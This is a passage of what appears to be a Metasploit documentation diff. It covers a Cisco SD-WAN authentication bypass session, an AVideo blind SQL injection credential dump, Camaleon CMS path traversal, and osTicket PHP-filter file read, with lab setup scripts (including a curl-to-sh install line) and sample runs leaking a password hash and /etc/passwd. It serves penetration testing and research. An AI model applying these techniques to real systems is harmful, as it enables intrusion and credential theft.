msf auxiliary(admin/networking/cisco_sdwan_auth_bypass) >
```
Now we can use the generated SSH key to access the NETCONF service:
```console
sfewer@sfewer-ubuntu-vm:~$ chmod 600 /home/sfewer/.msf4/loot/20260326150429_default_192.168.86.166_cisco.sdwan.sshk_366073.pem
sfewer@sfewer-ubuntu-vm:~$ ssh -i /home/sfewer/.msf4/loot/20260326150429_default_192.168.86.166_cisco.sdwan.sshk_366073.pem vmanage-admin@192.168.86.166 -p 830
viptela 20.15.3
<?xml version="1.0" encoding="UTF-8"?>
<hello xmlns="urn:ietf:params:xml:ns:netconf:base:1.0">
<capabilities>
<capability>urn:ietf:params:netconf:base:1.0</capability>
<capability>urn:ietf:params:netconf:base:1.1</capability>
<capability>urn:ietf:params:netconf:capability:confirmed-commit:1.1</capability>
<capability>urn:ietf:params:netconf:capability:confirmed-commit:1.0</capability>
<capability>urn:ietf:params:netconf:capability:candidate:1.0</capability>
<capability>urn:ietf:params:netconf:capability:rollback-on-error:1.0</capability>
<capability>urn:ietf:params:netconf:capability:url:1.0?scheme=ftp,sftp,file</capability>
<capability>urn:ietf:params:netconf:capability:validate:1.0</capability>
<capability>urn:ietf:params:netconf:capability:validate:1.1</capability>
<capability>urn:ietf:params:netconf:capability:xpath:1.0</capability>
<capability>urn:ietf:params:netconf:capability:notification:1.0</capability>
<capability>urn:ietf:params:netconf:capability:interleave:1.0</capability>
<capability>urn:ietf:params:netconf:capability:partial-lock:1.0</capability>
<capability>urn:ietf:params:netconf:capability:with-defaults:1.0?basic-mode=trim&amp;also-supported=report-all-tagged,report-all</capability>
<capability>urn:ietf:params:netconf:capability:with-operational-defaults:1.0?basic-mode=trim&amp;also-supported=report-all-tagged,report-all</capability>
<capability>urn:ietf:params:netconf:capability:yang-library:1.0?revision=2019-01-04&amp;module-set-id=f1952c280658dd3701add48f1c71cbca</capability>
<capability>urn:ietf:params:netconf:capability:yang-library:1.1?revision=2019-01-04&amp;content-id=f1952c280658dd3701add48f1c71cbca</capability>
<capability>http://tail-f.com/ns/netconf/actions/1.0</capability>
<capability>http://tail-f.com/ns/aaa/1.1?module=tailf-aaa&amp;revision=2023-04-13</capability>
<capability>http://tail-f.com/ns/common/query?module=tailf-common-query&amp;revision=2017-12-15</capability>
<capability>http://tail-f.com/ns/confd-progress?module=tailf-confd-progress&amp;revision=2020-06-29</capability>
<capability>http://tail-f.com/ns/confd_dyncfg/1.0?module=confd_dyncfg&amp;revision=2023-09-29</capability>
<capability>http://tail-f.com/ns/ietf-subscribed-notifications-deviation?module=ietf-subscribed-notifications-deviation&amp;revision=2020-06-25</capability>
<capability>http://tail-f.com/ns/ietf-yang-push-deviation?module=ietf-yang-push-deviation</capability>
<capability>http://tail-f.com/ns/kicker?module=tailf-kicker&amp;revision=2020-11-26</capability>
<capability>http://tail-f.com/ns/mibs/IPV6-TC/199812010000Z?module=IPV6-TC&amp;revision=1998-12-01</capability>
<capability>http://tail-f.com/ns/mibs/SNMP-COMMUNITY-MIB/200308060000Z?module=SNMP-COMMUNITY-MIB&amp;revision=2003-08-06</capability>
<capability>http://tail-f.com/ns/mibs/SNMP-FRAMEWORK-MIB/200210140000Z?module=SNMP-FRAMEWORK-MIB&amp;revision=2002-10-14</capability>
<capability>http://tail-f.com/ns/mibs/SNMP-MPD-MIB/200210140000Z?module=SNMP-MPD-MIB&amp;revision=2002-10-14</capability>
<capability>http://tail-f.com/ns/mibs/SNMP-NOTIFICATION-MIB/200210140000Z?module=SNMP-NOTIFICATION-MIB&amp;revision=2002-10-14</capability>
<capability>http://tail-f.com/ns/mibs/SNMP-TARGET-MIB/200210140000Z?module=SNMP-TARGET-MIB&amp;revision=2002-10-14</capability>
<capability>http://tail-f.com/ns/mibs/SNMP-USER-BASED-SM-MIB/200210160000Z?module=SNMP-USER-BASED-SM-MIB&amp;revision=2002-10-16</capability>
<capability>http://tail-f.com/ns/mibs/SNMP-VIEW-BASED-ACM-MIB/200210160000Z?module=SNMP-VIEW-BASED-ACM-MIB&amp;revision=2002-10-16</capability>
<capability>http://tail-f.com/ns/mibs/SNMPv2-MIB/200210160000Z?module=SNMPv2-MIB&amp;revision=2002-10-16</capability>
<capability>http://tail-f.com/ns/mibs/SNMPv2-SMI/1.0?module=SNMPv2-SMI</capability>
<capability>http://tail-f.com/ns/mibs/SNMPv2-TC/1.0?module=SNMPv2-TC</capability>
<capability>http://tail-f.com/ns/mibs/TRANSPORT-ADDRESS-MIB/200211010000Z?module=TRANSPORT-ADDRESS-MIB&amp;revision=2002-11-01</capability>
<capability>http://tail-f.com/ns/netconf/query?module=tailf-netconf-query&amp;revision=2017-01-06</capability>
<capability>http://tail-f.com/yang/acm?module=tailf-acm&amp;revision=2013-03-07</capability>
<capability>http://tail-f.com/yang/common?module=tailf-common&amp;revision=2023-12-07</capability>
<capability>http://tail-f.com/yang/common-monitoring?module=tailf-common-monitoring&amp;revision=2022-09-29</capability>
<capability>http://tail-f.com/yang/common-monitoring2?module=tailf-common-monitoring2&amp;revision=2022-09-29</capability>
<capability>http://tail-f.com/yang/confd-monitoring?module=tailf-confd-monitoring&amp;revision=2022-09-29</capability>
<capability>http://tail-f.com/yang/confd-monitoring2?module=tailf-confd-monitoring2&amp;revision=2022-10-03</capability>
<capability>http://tail-f.com/yang/last-login?module=tailf-last-login&amp;revision=2019-11-21</capability>
<capability>http://tail-f.com/yang/netconf-monitoring?module=tailf-netconf-monitoring&amp;revision=2022-04-12</capability>
<capability>http://tail-f.com/yang/xsd-types?module=tailf-xsd-types&amp;revision=2017-11-20</capability>
<capability>http://viptela.com/aaa-ext?module=viptela-aaa-ext&amp;revision=2024-07-01</capability>
<capability>http://viptela.com/actions?module=viptela-actions&amp;revision=2024-07-01</capability>
<capability>http://viptela.com/clear?module=viptela-clear&amp;revision=2024-07-01</capability>
<capability>http://viptela.com/common?module=viptela-common&amp;revision=2024-07-01</capability>
<capability>http://viptela.com/debug?module=viptela-debug&amp;revision=2024-07-01</capability>
<capability>http://viptela.com/devices?module=viptela-devices</capability>
<capability>http://viptela.com/hardware?module=viptela-hardware&amp;revision=2024-07-01</capability>
<capability>http://viptela.com/idmgr?module=viptela-idmgr&amp;revision=2024-07-01</capability>
<capability>http://viptela.com/models?module=viptela-models</capability>
<capability>http://viptela.com/omp?module=viptela-omp&amp;revision=2024-07-01</capability>
<capability>http://viptela.com/oper-idmgr?module=viptela-oper-idmgr&amp;revision=2024-07-01</capability>
<capability>http://viptela.com/oper-system?module=viptela-oper-system&amp;revision=2024-07-01</capability>
<capability>http://viptela.com/oper-tenant?module=viptela-oper-tenant</capability>
<capability>http://viptela.com/oper-vpn?module=viptela-oper-vpn&amp;revision=2024-07-01</capability>
<capability>http://viptela.com/policy?module=viptela-policy&amp;revision=2024-07-01&amp;deviations=viptela-policy-deviation</capability>
<capability>http://viptela.com/security?module=viptela-security&amp;revision=2024-07-01</capability>
<capability>http://viptela.com/snmp?module=viptela-snmp&amp;revision=2024-07-01</capability>
<capability>http://viptela.com/snmp-usm?module=viptela-snmp-usm&amp;revision=2024-07-01</capability>
<capability>http://viptela.com/support?module=viptela-support&amp;revision=2024-07-01</capability>
<capability>http://viptela.com/system?module=viptela-system&amp;revision=2024-07-01&amp;deviations=viptela-system-deviation</capability>
<capability>http://viptela.com/tag-instance?module=viptela-tag-instance&amp;revision=2024-07-01</capability>
<capability>http://viptela.com/tenant?module=viptela-tenant&amp;revision=2024-07-01</capability>
<capability>http://viptela.com/timezones?module=viptela-timezones&amp;revision=2024-07-01</capability>
<capability>http://viptela.com/viptela-clear-tenant?module=viptela-clear-tenant</capability>
<capability>http://viptela.com/viptela-debug-tenant?module=viptela-debug-tenant</capability>
<capability>http://viptela.com/viptela-global?module=viptela-global&amp;revision=2024-07-01</capability>
<capability>http://viptela.com/vpn?module=viptela-vpn&amp;revision=2024-07-01</capability>
<capability>urn:ietf:params:xml:ns:netconf:base:1.0?module=ietf-netconf&amp;revision=2011-06-01&amp;features=confirmed-commit,candidate,rollback-on-error,validate,xpath,url</capability>
<capability>urn:ietf:params:xml:ns:netconf:partial-lock:1.0?module=ietf-netconf-partial-lock&amp;revision=2009-10-19</capability>
<capability>urn:ietf:params:xml:ns:yang:iana-crypt-hash?module=iana-crypt-hash&amp;revision=2014-08-06&amp;features=crypt-hash-sha-512,crypt-hash-sha-256,crypt-hash-md5</capability>
<capability>urn:ietf:params:xml:ns:yang:ietf-inet-types?module=ietf-inet-types&amp;revision=2013-07-15</capability>
<capability>urn:ietf:params:xml:ns:yang:ietf-netconf-acm?module=ietf-netconf-acm&amp;revision=2018-02-14</capability>
<capability>urn:ietf:params:xml:ns:yang:ietf-netconf-monitoring?module=ietf-netconf-monitoring&amp;revision=2010-10-04</capability>
<capability>urn:ietf:params:xml:ns:yang:ietf-netconf-notifications?module=ietf-netconf-notifications&amp;revision=2012-02-06</capability>
<capability>urn:ietf:params:xml:ns:yang:ietf-netconf-with-defaults?module=ietf-netconf-with-defaults&amp;revision=2011-06-01</capability>
<capability>urn:ietf:params:xml:ns:yang:ietf-restconf-monitoring?module=ietf-restconf-monitoring&amp;revision=2017-01-26</capability>
<capability>urn:ietf:params:xml:ns:yang:ietf-x509-cert-to-name?module=ietf-x509-cert-to-name&amp;revision=2014-12-10</capability>
<capability>urn:ietf:params:xml:ns:yang:ietf-yang-metadata?module=ietf-yang-metadata&amp;revision=2016-08-05</capability>
<capability>urn:ietf:params:xml:ns:yang:ietf-yang-smiv2?module=ietf-yang-smiv2&amp;revision=2012-06-22</capability>
<capability>urn:ietf:params:xml:ns:yang:ietf-yang-types?module=ietf-yang-types&amp;revision=2013-07-15</capability>
</capabilities>
<session-id>25</session-id></hello>]]>]]>
```
@@ -1,4 +1,4 @@
PhoenixContact Programmable Logic Controllers are built are using a variant of
PhoenixContact Programmable Logic Controllers are built using a variant of
ProConOS. The communicate using a proprietary protocol over ports TCP/1962 and
TCP/41100 or TCP/20547. This protocol allows a user to remotely determine the
PLC type, firmware and build number on port TCP/1962. A user can also
@@ -3,7 +3,7 @@ This module will accept files from a live vCenter appliance or from a vCenter ap
archive; either or both files can be supplied to the module depending on the situation. The module
will extract the vCenter SSO IdP signing credential from the vmdir database, which can be used to
create forged SAML assertions and access the SSO directory as an administrator. The vmafd service
contains the vCenter certificate store which from which the module will attempt to extract all vmafd
contains the vCenter certificate store, from which the module will attempt to extract all vmafd
certificates that also have a corresponding private key. Portions of this module are based on
information published by Zach Hanley at Horizon3:
@@ -88,7 +88,7 @@ Default is `false`.
### PBKDF2-HMAC-SHA512
Crack SHA12 hashes. Default is `true`.
Crack SHA512 hashes. Default is `true`.
### POT
@@ -0,0 +1,148 @@
## Vulnerable Application
This module exploits an unauthenticated SQL injection vulnerability in AVideo's
`videos.json.php` endpoint to extract user credentials (usernames and password hashes).
**CVE ID:** CVE-2026-28501
**Affected Versions:** AVideo <= 22.0. Fixed in 24.0.
### Vulnerability Overview
The `catName` parameter is injected unsanitized into SQL queries via the `getCatSQL()` function.
A global security filter in `security.php` strips quotes from GET/POST parameters, but sending
`catName` via a JSON request body bypasses this filter because the JSON input is parsed and
merged into `$_REQUEST` after the security checks have already executed.
The module uses time-based blind SQL injection with `BENCHMARK()` to extract data.
`SLEEP()` cannot be used because the application's `sqlDAL` layer uses prepared statements
that prevent it, but `BENCHMARK()` works via a multiplication pattern that embeds the boolean
condition as a multiplier on the iteration count.
### Setup
This lab reuses the same AVideo Docker environment as the `avideo_encoder_getimage_cmd_injection`
module.
1. Clone the AVideo repository and checkout the vulnerable commit:
```bash
cd /tmp
git clone https://github.com/WWBN/AVideo.git
cd AVideo
git checkout 596df4e5b0597c9806da76ebec5bbe3b305953e4
```
2. Create a `.env` file with the following configuration:
```bash
cat > .env << EOF
SERVER_NAME=localhost
CREATE_TLS_CERTIFICATE=yes
DB_MYSQL_HOST=database
DB_MYSQL_PORT=3306
DB_MYSQL_NAME=avideo
DB_MYSQL_USER=avideo
DB_MYSQL_PASSWORD=avideo
HTTP_PORT=80
HTTPS_PORT=9443
NETWORK_SUBNET=172.99.0.0/16
EOF
```
3. Fix MariaDB corrupted tc.log issue (required for first-time setup):
```bash
cat > deploy/docker-entrypoint-mariadb << 'SCRIPTEOF'
#!/bin/bash
set -e
if [ -f /var/lib/mysql/tc.log ]; then
MAGIC_HEADER=$(head -c 4 /var/lib/mysql/tc.log | od -An -tx1 | tr -d ' \n' 2>/dev/null || echo "")
if [ "$MAGIC_HEADER" != "01000000" ] && [ -n "$MAGIC_HEADER" ]; then
echo "[Entrypoint]: Removing corrupted tc.log file (bad magic header: $MAGIC_HEADER)"
rm -f /var/lib/mysql/tc.log
fi
fi
SCRIPTEOF
chmod +x deploy/docker-entrypoint-mariadb
cat >> Dockerfile.mariadb << 'DOCKERFILEEOF'
COPY deploy/docker-entrypoint-mariadb /usr/local/bin/docker-entrypoint-mariadb
RUN chmod +x /usr/local/bin/docker-entrypoint-mariadb
RUN sed -i '2i /usr/local/bin/docker-entrypoint-mariadb' /usr/local/bin/docker-entrypoint.sh
DOCKERFILEEOF
docker compose build database database_encoder
```
4. Start the Docker Compose environment:
```bash
docker compose up -d
```
5. Wait for the services to be ready and access the application at `http://localhost`.
Complete the installation wizard if this is a first-time setup.
## Verification Steps
1. Start `msfconsole`
2. `use auxiliary/gather/avideo_catname_sqli`
3. `set RHOSTS <target_ip>`
4. `set RPORT <target_port>` (default: 80)
5. `run`
6. **Verify** that user credentials are extracted and displayed
## Options
### COUNT
Number of users to dump. Default: 0 (all users).
### SqliDelay
Time delay threshold for blind injection (default: 1.0 second). Lower values are faster
but may produce false positives on slow networks.
## Scenarios
### Credential dump against AVideo <= 22.0
```
msf > use auxiliary/gather/avideo_catname_sqli
msf auxiliary(gather/avideo_catname_sqli) > set RHOSTS localhost
RHOSTS => localhost
msf auxiliary(gather/avideo_catname_sqli) > set RPORT 80
RPORT => 80
msf auxiliary(gather/avideo_catname_sqli) > set COUNT 1
COUNT => 1
msf auxiliary(gather/avideo_catname_sqli) > run
[*] Running module against 127.0.0.1
[*] Running automatic check ("set AutoCheck false" to disable)
[*] {SQLi} Calibrating BENCHMARK iterations for 1.0s delay...
[*] {SQLi} Probe: 1000000 iterations took 0.127s
[*] {SQLi} Calibrated: 23622047 iterations for ~1.0s delay
[+] The target is vulnerable. Time-based blind SQLi confirmed via BENCHMARK()
[*] Dumping user credentials from the users table...
[!] Time-based blind extraction is slow (~4s per character). Be patient.
[*] {SQLi} [char 1/38] = "a"
[*] {SQLi} [char 2/38] = "d"
[*] {SQLi} [char 3/38] = "m"
[*] {SQLi} [char 4/38] = "i"
[*] {SQLi} [char 5/38] = "n"
[*] {SQLi} [char 6/38] = ";"
[*] {SQLi} [char 7/38] = "5"
...
[*] {SQLi} [char 38/38] = "9"
AVideo Users
============
user password
---- --------
admin 5f4dcc3b5aa765d61d8327deb882cf99
[+] Loot saved to: /home/user/.msf4/loot/20260306_default_127.0.0.1_avideo.users_123456.txt
[*] Auxiliary module execution completed
```
@@ -0,0 +1,216 @@
## Vulnerable Application
This module attempts to read files from an authenticated directory traversal vuln in Camaleon CMS versions <= 2.8.0 and version 2.9.0.
CVE-2024-46987 mistakenly indicates that versions 2.8.1 and 2.8.2 are also vulnerable, however this is not the case.
## Setup
See [Camaleon CMS](https://github.com/owen2345/camaleon-cms) documentation.
The following describes how to setup Camaleon CMS version 2.8.0 on Ubuntu.
### Requirements
- Rails 6.1+
- PostgreSQL, MySQL 5+ or SQlite
- Ruby 3.0+
- Imagemagick
### Install Ruby
guides.rubyonrails.org/install_ruby_on_rails.html
~~~bash
sudo apt install build-essential rustc libssl-dev libyaml-dev zlib1g-dev libgmp-dev git curl
~~~
### Install Mise
~~~bash
curl https://mise.run | sh
echo "eval \"\$(~/.local/bin/mise activate)\"" >> ~/.bashrc
source ~/.bashrc
~~~
### Install Ruby with Mise
~~~bash
$ mise use -g ruby@3.0
$ ruby --version
ruby 3.0.7p220 ...
~~~
### Install Imagemagick
~~~bash
sudo apt install --no-install-recommends imagemagick
~~~
### Install Postgresql
~~~bash
sudo apt install postgresql
~~~
### Install Rails
~~~bash
$ gem install rails -v 6.1
~~~
#### concurrent-ruby Issue
Downgrade concurrent-ruby to 1.3.4
~~~bash
$ gem list concurrent-ruby
concurrent-ruby (1.3.6)
$ gem install concurrent-ruby -v 1.3.4
$ gem uninstall concurrent-ruby -v 1.3.6
$ rails --version
Rails 6.1.7.10
~~~
### Create Rails Project
Run `rails new camaleon_project`
### Gemfile
In your Gemfile do the following:
Replace `gem 'spring'` with `gem 'spring', '4.2.1'`
Delete this line to prevent [conflict](https://github.com/owen2345/camaleon-cms/issues/1111): `gem 'sass-rails', '>= 6'`
Put these lines at the bottom of your Gemfile:
~~~
gem 'camaleon_cms', '2.8.0'
gem 'concurrent-ruby', '1.3.4'
~~~
### Install Bundle
From the project directory run `bundle install`
### Webpacker.yml Issue
~~~bash
wget -O camaleon_project/config/webpacker.yml https://raw.githubusercontent.com/rails/webpacker/master/lib/install/config/webpacker.yml
~~~
### Camaleon CMS Installation
~~~bash
rails generate camaleon_cms:install
rake camaleon_cms:generate_migrations
rake db:migrate
~~~
### Run Rails
~~~bash
bundle exec rails server -b 0.0.0.0
~~~
Navigate to `http://{ip address}:3000` and enter test under the Name field.
### Setup Server
When prompted with the new installation page just enter "test" into the Name field and continue.
#### Create Unprivileged User (Optional)
Navigate to `http://{ip address}:3000/admin` - login with the default admin credentials "admin:admin123"
Then navigate to "Users -> + Add User" and fill out the form.
## Verification Steps
1. Do: `use auxiliary/gather/camaleon_download_private_file`
2. Do: `set RHOST [IP]`
3. Do: `run`
## Options
### FILEPATH
The filepath of the file to read.
### DEPTH
The number of "../" appended to the filename. Default is 13
## Scenarios
```
msf > use auxiliary/gather/camaleon_download_private_file
msf auxiliary(gather/camaleon_download_private_file) > set rhost 10.0.0.45
rhost => 10.0.0.45
msf auxiliary(gather/camaleon_download_private_file) > set rport 3000
rport => 3000
msf auxiliary(gather/camaleon_download_private_file) > set ssl false
ssl => false
msf auxiliary(gather/camaleon_download_private_file) > run
[*] Running module against 10.0.0.45
[+] /etc/passwd stored as '/home/kali/.msf4/loot/20260411192711_default_10.0.0.45_camaleon.travers_926890.txt'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin
systemd-timesync:x:996:996:systemd Time Synchronization:/:/usr/sbin/nologin
dhcpcd:x:100:65534:DHCP Client Daemon,,,:/usr/lib/dhcpcd:/bin/false
messagebus:x:101:101::/nonexistent:/usr/sbin/nologin
syslog:x:102:102::/nonexistent:/usr/sbin/nologin
systemd-resolve:x:991:991:systemd Resolver:/:/usr/sbin/nologin
uuidd:x:103:103::/run/uuidd:/usr/sbin/nologin
usbmux:x:104:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
tss:x:105:105:TPM software stack,,,:/var/lib/tpm:/bin/false
systemd-oom:x:990:990:systemd Userspace OOM Killer:/:/usr/sbin/nologin
kernoops:x:106:65534:Kernel Oops Tracking Daemon,,,:/:/usr/sbin/nologin
whoopsie:x:107:109::/nonexistent:/bin/false
dnsmasq:x:999:65534:dnsmasq:/var/lib/misc:/usr/sbin/nologin
avahi:x:108:111:Avahi mDNS daemon,,,:/run/avahi-daemon:/usr/sbin/nologin
tcpdump:x:109:112::/nonexistent:/usr/sbin/nologin
sssd:x:110:113:SSSD system user,,,:/var/lib/sss:/usr/sbin/nologin
speech-dispatcher:x:111:29:Speech Dispatcher,,,:/run/speech-dispatcher:/bin/false
cups-pk-helper:x:112:114:user for cups-pk-helper service,,,:/nonexistent:/usr/sbin/nologin
fwupd-refresh:x:989:989:Firmware update daemon:/var/lib/fwupd:/usr/sbin/nologin
saned:x:113:116::/var/lib/saned:/usr/sbin/nologin
geoclue:x:114:117::/var/lib/geoclue:/usr/sbin/nologin
cups-browsed:x:115:114::/nonexistent:/usr/sbin/nologin
hplip:x:116:7:HPLIP system user,,,:/run/hplip:/bin/false
gnome-remote-desktop:x:988:988:GNOME Remote Desktop:/var/lib/gnome-remote-desktop:/usr/sbin/nologin
polkitd:x:987:987:User for polkitd:/:/usr/sbin/nologin
rtkit:x:117:119:RealtimeKit,,,:/proc:/usr/sbin/nologin
colord:x:118:120:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
gnome-initial-setup:x:119:65534::/run/gnome-initial-setup/:/bin/false
gdm:x:120:121:Gnome Display Manager:/var/lib/gdm3:/bin/false
nm-openvpn:x:121:122:NetworkManager OpenVPN,,,:/var/lib/openvpn/chroot:/usr/sbin/nologin
bittman:x:1000:1000:bittman:/home/bittman:/bin/bash
postgres:x:122:124:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
[*] Auxiliary module execution completed
```
@@ -0,0 +1,1030 @@
## Vulnerable Application
Enhancesoft osTicket is a widely-used open-source support ticket system.
This module exploits an arbitrary file read vulnerability (CVE-2026-22200), which affects Enhancesoft osTicket versions 1.18.x prior to 1.18.3 and 1.17.x prior to 1.17.7. In vulnerable deployments, this issue can often be triggered by unauthenticated or guest users when ticket self-service is enabled; however, the Metasploit module itself currently uses an authenticated workflow and requires valid osTicket credentials.
This vulnerability arises due to improper sanitization of PHP filter expressions within rich-text HTML ticket submissions before they are processed by the mPDF PDF generator during export.
To exploit this vulnerability, an attacker submits a ticket containing malicious payload syntax (such as `php://` or `phar://` bypasses like `php:\\` or `./php://`). When the ticket is subsequently exported to PDF, the mPDF library reads the targeted local file and embeds its contents within the generated PDF as a bitmap image. This allows remote attackers to disclose sensitive local files, such as `/etc/passwd` or `include/ost-config.php`, in the context of the osTicket web application user.
In real-world deployments, this issue may be exploitable in default configurations where guests may create tickets and access ticket status, or where self-registration is enabled. The provided Metasploit module, however, models an authenticated scenario and assumes you have working staff or admin credentials with permission to create and export tickets to PDF
## Installation
### Using any Ubuntu VM (Recommended Way)
1. OsTicket can be installed with the given script on any Ubuntu VM:
```bash
#!/bin/bash
set -e # Exit on error
# Colors for verbose output
GREEN='\033[0;32m'
BLUE='\033[0;34m'
RED='\033[0;31m'
NC='\033[0m' # No Color
log() {
echo -e "${BLUE}[+] $1${NC}"
}
success() {
echo -e "${GREEN}[OK] $1${NC}"
}
error() {
echo -e "${RED}[ERROR] $1${NC}"
exit 1
}
DB_NAME="osticket_db"
DB_USER="osticket_user"
DB_PASS="P@ssw0rd123!" # Change this if needed
INSTALL_DIR="/var/www/html/osticket"
OSTICKET_VER="v1.18.1"
DOWNLOAD_URL="https://github.com/osTicket/osTicket/releases/download/${OSTICKET_VER}/osTicket-${OSTICKET_VER}.zip"
if [ "$EUID" -ne 0 ]; then
error "Please run as root (sudo ./setup_osticket_cve_env.sh)"
fi
log "Updating system packages..."
apt-get update -q
log "Installing dependencies (software-properties-common, git, unzip, curl)..."
apt-get install -y software-properties-common git unzip curl
log "Adding ondrej/php repository to ensure PHP 8.2 availability..."
add-apt-repository -y ppa:ondrej/php
apt-get update -q
log "Installing Apache, MariaDB, and PHP 8.2 extensions..."
apt-get install -y \
apache2 \
mariadb-server \
php8.2 \
php8.2-mysql \
php8.2-mbstring \
php8.2-gd \
php8.2-intl \
php8.2-apcu \
php8.2-xml \
php8.2-curl \
php8.2-zip \
php8.2-imap \
php8.2-bcmath \
libapache2-mod-php8.2
success "LAMP stack installed."
log "Configuring MySQL/MariaDB..."
service mysql start
mysql -u root -e "CREATE DATABASE IF NOT EXISTS ${DB_NAME};"
mysql -u root -e "CREATE USER IF NOT EXISTS '${DB_USER}'@'localhost' IDENTIFIED BY '${DB_PASS}';"
mysql -u root -e "GRANT ALL PRIVILEGES ON ${DB_NAME}.* TO '${DB_USER}'@'localhost';"
mysql -u root -e "FLUSH PRIVILEGES;"
success "Database '${DB_NAME}' created with user '${DB_USER}'."
log "Downloading osTicket ${OSTICKET_VER}..."
mkdir -p /tmp/osticket_install
wget -O /tmp/osticket_install/osticket.zip "${DOWNLOAD_URL}"
if [ ! -f /tmp/osticket_install/osticket.zip ]; then
error "Download failed. Check internet connection or URL."
fi
log "Cleaning up old installations..."
rm -rf ${INSTALL_DIR}
mkdir -p ${INSTALL_DIR}
log "Extracting files..."
unzip -q /tmp/osticket_install/osticket.zip -d /tmp/osticket_install/
cp -r /tmp/osticket_install/upload/* ${INSTALL_DIR}/
log "Preparing configuration file..."
cd ${INSTALL_DIR}/include
if [ -f ost-sampleconfig.php ]; then
cp ost-sampleconfig.php ost-config.php
else
error "ost-sampleconfig.php not found! Extraction might have failed."
fi
chmod 0666 ost-config.php
log "Configuring Apache Virtual Host..."
CONF_FILE="/etc/apache2/sites-available/osticket.conf"
cat > ${CONF_FILE} <<EOF
<VirtualHost *:80>
ServerAdmin admin@localhost
DocumentRoot ${INSTALL_DIR}
<Directory ${INSTALL_DIR}>
Options Indexes FollowSymLinks MultiViews
AllowOverride All
Require all granted
</Directory>
ErrorLog \${APACHE_LOG_DIR}/error.log
CustomLog \${APACHE_LOG_DIR}/access.log combined
</VirtualHost>
EOF
a2dissite 000-default.conf
a2ensite osticket.conf
a2enmod rewrite
chown -R www-data:www-data ${INSTALL_DIR}
chmod -R 755 ${INSTALL_DIR}
chmod 0666 ${INSTALL_DIR}/include/ost-config.php
log "Restarting Apache..."
service apache2 restart
rm -rf /tmp/osticket_install
IP_ADDR=$(hostname -I | cut -d' ' -f1)
echo "================================================================="
echo -e "${GREEN} INSTALLATION COMPLETE ${NC}"
echo "================================================================="
echo -e "Target: osTicket ${OSTICKET_VER} (Vulnerable to CVE-2026-22200)"
echo -e "Access the setup wizard at: ${BLUE}http://${IP_ADDR}/setup/${NC}"
echo "-----------------------------------------------------------------"
echo "Database Details for the Wizard:"
echo -e "MySQL Database: ${BLUE}${DB_NAME}${NC}"
echo -e "MySQL Username: ${BLUE}${DB_USER}${NC}"
echo -e "MySQL Password: ${BLUE}${DB_PASS}${NC}"
echo "-----------------------------------------------------------------"
echo "Setup Instructions:"
echo "1. Open the URL above in your browser."
echo "2. Ensure all prerequisites show a green checkmark."
echo "3. Fill in the 'System Settings' (use any admin info)."
echo "4. Fill in the 'Database Settings' using the credentials above."
echo "5. Click 'Install Now'."
echo "================================================================="
```
2. After installation and creation of the database, one final step is required to complete osTicket installation and that must be done through the browser. Navigate to your osTicket URL (e.g., `http://localhost/support`) to access the "Basic Installation" screen. You will need to fill out three main sections to finalize the setup:
**System Settings**
This section defines the basic identity of your helpdesk:
- **Helpdesk Name:** The title of your support site (e.g., "IT Support" or "Customer Helpdesk").
- **Default Email:** The primary email address from which the system will send outgoing notifications.
**Admin User**
This section creates the master administrator account for the osTicket backend:
- **First Name & Last Name:** The administrator's real name.
- **Email Address:** The administrator's email address (used for password resets and system alerts). Must be different from **Default Email** mentioned above.
- **Username:** The login username for the admin panel.
- **Password & Retype Password:** The password for the admin account.
**Database Settings**
This section connects the application to your pre-configured MySQL/MariaDB database:
- **MySQL Table Prefix:** Typically left as the default `ost_` unless you are sharing the database with other applications.
- **MySQL Hostname:** The address of your database server (usually `localhost` or `127.0.0.1` if hosted on the same machine).
- **MySQL Database:** The name of the blank database you created prior to running the installer (e.g., `osticket_db`).
- **MySQL Username:** The database user with privileges to read, write, and modify the database (e.g., `osticket_user` or a dedicated user).
- **MySQL Password:** The password for the MySQL user. We are using `P@ssw0rd123!` in the above script.
Once these fields are filled out, click **"Install Now"** to populate the database and complete the installation. *(Note: Ensure that the `include/ost-sampleconfig.php` file has been copied, renamed to `include/ost-config.php`, and has write permissions enabled before clicking install)*.
3. After installation is completed. Sign up and create a user. This user will need to verify itself using a magic link. Since we are not setting up any mail server, we have to login with the administrator user, reset their password from `/scp/users.php` to activate the user account.
4. Create a new ticket and note down the ticket number (It will have a number like: `#527686`)
### Using Docker
OsTicket does not ship their official docker so have a monolithic setup is the best way to install it.
1. Use the following Dockerfile to setup:
```Dockerfile
FROM ubuntu:22.04
ENV DEBIAN_FRONTEND=noninteractive
ENV DB_NAME="osticket_db" \
DB_USER="osticket_user" \
DB_PASS="P@ssw0rd123!" \
INSTALL_DIR="/var/www/html/osticket" \
OSTICKET_VER="v1.18.1"
RUN apt-get update -q && apt-get install -y \
software-properties-common \
git \
unzip \
curl \
wget \
nano \
&& rm -rf /var/lib/apt/lists/*
RUN add-apt-repository -y ppa:ondrej/php && apt-get update -q
RUN apt-get install -y \
apache2 \
mariadb-server \
php8.2 \
php8.2-mysql \
php8.2-mbstring \
php8.2-gd \
php8.2-intl \
php8.2-apcu \
php8.2-xml \
php8.2-curl \
php8.2-zip \
php8.2-imap \
php8.2-bcmath \
libapache2-mod-php8.2 \
&& rm -rf /var/lib/apt/lists/*
RUN service mariadb start && \
sleep 3 && \
